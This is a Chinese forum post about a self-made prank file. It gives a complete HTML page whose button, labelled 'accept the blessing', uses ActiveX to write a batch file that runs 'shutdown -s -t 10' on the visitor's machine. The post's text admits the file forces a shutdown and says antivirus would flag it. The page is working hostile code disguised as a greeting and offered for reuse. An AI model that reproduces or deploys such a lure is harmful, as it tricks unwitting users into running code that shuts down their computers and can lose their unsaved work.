[quote]
最近喜欢上了bat,经过几天的学习,对它也有了初步的了解,自己做了一个文件,也娱乐下。呵呵,这个文件可以强制关机哦,前提没有杀毒软件了,不然就会被杀掉了。
[/quote]
最近喜欢上了bat,经过几天的学习,对它也有了初步的了解,自己做了一个文件,也娱乐下。呵呵,这个文件可以强制关机哦,前提没有杀毒软件了,不然就会被杀掉了。
[/quote]
<html>
<head>
<script type="text/javascript">
function test(){
var fso, tf;
fso = new ActiveXObject("Scripting.FileSystemObject"); //获得文件对象
tf = fso.CreateTextFile("c:\\run.bat", true); //创建文件
tf.WriteLine("@echo off\r\n") ; //写入一样并且换行
tf.WriteLine("shutdown -s -t 10 \r\n") ; //写入一行并且换行
tf.WriteBlankLines(1) ; //写入一个空行
tf.Close();
}
function run(){
test();
var wsh = new ActiveXObject("WScript.Shell"); //获得运行程序的对象
wsh.Run("c:\\run.bat"); //运行刚才编写bat文件
}
</script>
</head>
<body>
<input name="botton" value="接受祝福" type="button" onClick="run()">
</body>
</html>